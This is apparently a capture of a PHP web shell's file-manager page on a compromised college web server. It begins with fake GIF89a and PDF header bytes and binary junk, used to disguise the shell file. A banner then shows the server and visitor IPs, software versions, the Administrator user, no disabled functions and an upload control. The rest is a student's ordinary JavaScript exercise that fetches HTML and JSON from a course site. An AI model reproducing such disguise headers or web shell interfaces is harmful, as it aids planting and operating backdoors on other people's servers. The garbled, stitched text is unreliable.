GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/CST1022/Resources/Week/15/ |
Upload File : |
"use strict"; function _Initialize() { fetchHTML(); fetchJSON(); } async function fetchHTML() { let StarID = 'wp4452ys'; let url = `https://cst.ridgewater.edu/Tools/AJAX_HTML/?StarID=${StarID}`; let response = await fetch(url); let text = await response.text(); // read response body as text theHTML.innerHTML = `HTML from the CST site.<br>`; theHTML.innerHTML += text; } async function fetchJSON() { let StarID = 'wp4452ys'; let url = `https://cst.ridgewater.edu/Tools/AJAX_JSON/?StarID=${StarID}`; let response = await fetch(url); let json = await response.json(); // read response body as text theJSON.innerHTML = `JSON from the CST site.<br>`; theJSON.innerHTML += `${json}<br>`; theJSON.innerHTML += `${JSON.stringify(json)}`; }